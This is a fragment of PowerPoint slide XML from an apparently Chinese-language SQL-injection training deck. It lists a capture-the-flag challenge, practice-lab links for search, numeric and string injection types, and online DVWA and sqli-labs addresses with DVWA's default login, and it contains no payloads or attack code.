            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>题目</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB34037B-F919-4D96-9F27-F0E99A54B7C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885447" y="1328032"/>
            <a:ext cx="9041568" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>攻防世界进阶：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>NewsCenter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08160434-6B6E-4B8B-9A5F-5CB272EEFDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885447" y="1776653"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B0F41C-A695-45D9-9505-98AB90C91A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843950" y="1326953"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>搜索型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D14A9B5-1722-4C4D-8104-B59C0720E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843950" y="1856270"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>数字型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7029C31-D654-402E-BE24-71274ACC9A51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885447" y="2401086"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED950F5-9CC3-48EC-9FEC-93C9961DAE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843950" y="2442686"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>字符型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3D6688-4CF9-41D9-860E-B79511FBFD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885447" y="3346340"/>
            <a:ext cx="4216219" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://47.106.211.30:8888/sqli/string.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="SourceSansPro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://47.106.211.30:8888/sqli/num.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="SourceSansPro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://47.106.211.30:8888/sqli/search.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="SourceSansPro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://47.106.211.30:8888/sqli/id.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="SourceSansPro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269A07F9-F44F-45B9-B9CD-9DE5601B6069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024528" y="3546395"/>
            <a:ext cx="954107" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>演示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30124905-32AB-46D3-8804-E14BE3E5CFB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2165066" y="4827241"/>
            <a:ext cx="3005951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://43.247.91.228:81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3ACEF7-73E5-4E0F-83BB-81507BC4B17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836941" y="4819503"/>
            <a:ext cx="1508939" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023B85C6-918A-4682-83A4-3627F44D914D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933447" y="4717774"/>
            <a:ext cx="1824602" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>Username:admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="SourceSansPro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>Password:password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7649849-0A7D-4F1F-BE44-37C934CAB4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2165066" y="5364966"/>
            <a:ext cx="2621230" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://43.247.91.228:84/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="矩形 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97111DC0-05DB-4987-9CF8-C1AAB3917F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="5349577"/>
            <a:ext cx="1739900" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>-libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376347694"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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 name="矩形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A2A171-6E7F-45EC-8D2E-4259908E2377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304895" y="585480"/>
            <a:ext cx="1582208" cy="485668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2D4AA"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD7DCC4-C9FE-4246-9714-98D64FD1DD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F20E5B-BB01-4781-BF29-B1C916D06F86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="图片 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF174A67-4922-4BC6-83D2-A97098BCC17B}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="图片 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{490AC81D-D163-438F-AA91-71F04C136D7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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAE7FC58-4EF1-4ABD-81A1-6E6412A84DB2}"/>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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC890AC9-3867-4259-8B59-37ACD32E37CB}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形: 圆角 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25986EA-6FBC-4E48-A751-EA1845E19251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659835" y="1047234"/>
            <a:ext cx="8891619" cy="4763531"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="椭圆 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329BC924-680A-4D51-A78C-B544337FD344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8282446" y="1963076"/>
            <a:ext cx="539178" cy="539178"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="椭圆 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DDD3EF5-4BE9-41B8-B77A-2F17D93E6ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3275004" y="2182532"/>
            <a:ext cx="270106" cy="270106"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
